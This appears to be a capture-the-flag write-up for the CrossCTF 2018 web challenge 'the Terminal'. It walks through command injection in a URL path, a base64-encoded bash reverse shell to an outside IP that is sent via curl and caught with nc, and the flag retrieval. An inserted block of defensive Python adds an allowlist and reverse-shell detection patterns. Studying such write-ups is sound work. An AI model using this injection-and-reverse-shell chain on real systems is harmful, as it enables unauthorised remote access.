CrossCTF_2018: the Terminal

Category: Web
Points: 401
Description:

How long more can you stand it? http://ctf.pwn.sg:4083

Write-up

This challenge was really fun. Firstly, accessing the challenge gives us a futuristic-looking terminal and some cryptic messages:

(Screenshot: Screen-Shot-2018-06-19-at-3.29.17-PM)

What do those mean? Looking at our network console, we find requests to other URLs:

(Screenshot: Screen-Shot-2018-06-19-at-3.31.21-PM)

Looking at the output, that looks strangely like the output of the Unix date command. Let's see if we can spoof that request and try something else, like ls.

(Screenshot: Screen-Shot-2018-06-19-at-3.34.00-PM)

Oh look, that's nice. Let's see if we can spawn a reverse shell and call it a day. Attempting an unescaped bash reverse shell proved fruitless, since / does not play nice with Flask, so we base64-encode our command and pipe it through to bash on the server:

$ echo 'bash -i >& /dev/tcp/188.166.248.233/31337 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xODguMTY2LjI0OC4yMzMvMzEzMzcgMD4mMQo=

Now that we have our payload, we percent-encode the spaces and try to get our reverse shell:

$ curl 'http://ctf.pwn.sg:4082/picturise/echo%20YmFzaCAtaSA+JiAvZGV2L3RjcC8xODguMTY2LjI0OC4yMzMvMzEzMzcgMD4mMQo=%20|%20base64%20-d%20|%20bash'
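What the challenge backend does here is classic command injection: a URL path segment ends up in a shell. As an added, defensive example that is not part of the original write-up (and not the challenge's own backend code), the Python below shows the hardened server-side pattern, a fixed allowlist of argv arrays run without a shell, next to detection logic that percent-decodes request paths, decodes embedded base64 tokens and flags decode-to-shell pipelines and reverse-shell strings. The allowlist ALLOWED_COMMANDS, the helper names (resolve_allowlisted, run_allowlisted, classify_request_path, scan_access_log) and the access-log lines are all constructed for this example; the second log line reuses the encoded payload shown above.

```python
import base64
import binascii
import re
import subprocess
from urllib.parse import unquote

# --- Hardened side: the endpoint never hands user input to a shell. ---
# Constructed allowlist: the URL path may only name an entry here, and each
# entry is a fixed argv executed without shell=True.
ALLOWED_COMMANDS = {
    "date": ["date", "-u"],
    "uptime": ["uptime"],
}


def resolve_allowlisted(name):
    """Map a command name from the URL to a fixed argv, or raise ValueError."""
    argv = ALLOWED_COMMANDS.get(name)
    if argv is None:
        raise ValueError("command not permitted: %r" % name)
    return list(argv)


def is_permitted(name):
    """True only for exact allowlist keys; 'date; id' or 'echo ...|bash' fail."""
    return name in ALLOWED_COMMANDS


def run_allowlisted(name, timeout=5):
    """Run an allowlisted command. No shell is involved, so metacharacters,
    pipes and encoded payloads in `name` simply fail the lookup above."""
    proc = subprocess.run(resolve_allowlisted(name), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


# --- Detection side: flag request paths that carry a shell pipeline. ---
SHELL_META = re.compile(r"[;|&`$<>]")
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba|z|da)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
REVERSE_SHELL_HINT = re.compile(r"/dev/tcp/|\bnc\b.*-e|\bbash -i\b")


def classify_request_path(raw_path):
    """Return the reasons a percent-encoded request path looks like command
    injection; an empty list means it looks like a plain command name."""
    path = unquote(raw_path)
    reasons = []
    if SHELL_META.search(path):
        reasons.append("shell metacharacters in path")
    if DECODE_TO_SHELL.search(path):
        reasons.append("base64 decode piped into a shell")
    # Decode any long base64-looking token and inspect the plaintext too,
    # so the payload cannot hide behind the encoding.
    for token in B64_TOKEN.findall(path):
        try:
            plain = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        if REVERSE_SHELL_HINT.search(plain) or SHELL_META.search(plain):
            reasons.append("encoded payload contains shell/reverse-shell content")
            break
    return reasons


# Combined-log-format request line; only the request path is needed.
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines):
    """Return [(path, reasons)] for every log line whose path is flagged."""
    hits = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        reasons = classify_request_path(m.group(1))
        if reasons:
            hits.append((m.group(1), reasons))
    return hits


# Constructed sample log lines: a legitimate date request like the one the
# write-up observes, and the encoded pipeline request quoted above.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jun/2018:15:31:00 +0800] "GET /picturise/date HTTP/1.1" 200 41',
    '10.0.0.9 - - [19/Jun/2018:15:34:00 +0800] "GET /picturise/echo%20YmFzaCAtaSA+JiAvZGV2L3RjcC8xODguMTY2LjI0OC4yMzMvMzEzMzcgMD4mMQo=%20|%20base64%20-d%20|%20bash HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for path, reasons in scan_access_log(SAMPLE_LOG):
        print(path, "->", "; ".join(reasons))
```

The detector deliberately looks inside base64 tokens: matching only on `|` or `bash` in the raw path misses a payload once it is wrapped in another encoding layer, whereas the hardened endpoint needs no detection at all because nothing it receives ever reaches a shell.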

On our server side:

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [192.168.254.1] from (UNKNOWN) [159.89.197.64] 35774
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$

Woot! Let's see if we can get a flag:

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [192.168.254.1] from (UNKNOWN) [159.89.197.64] 35776
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$ cd /home
cd /home
theterminal@9d629bb237f6:/home$ ls
ls
theterminal
theterminal@9d629bb237f6:/home$ cd theterminal
cd theterminal
theterminal@9d629bb237f6:/home/theterminal$ ls
ls
the_flag_is_here_not_elsewhere
theterminal@9d629bb237f6:/home/theterminal$ cat the_flag_is_here_not_elsewhere
cat the_flag_is_here_not_elsewhere
CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}

Therefore, the flag is CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}.
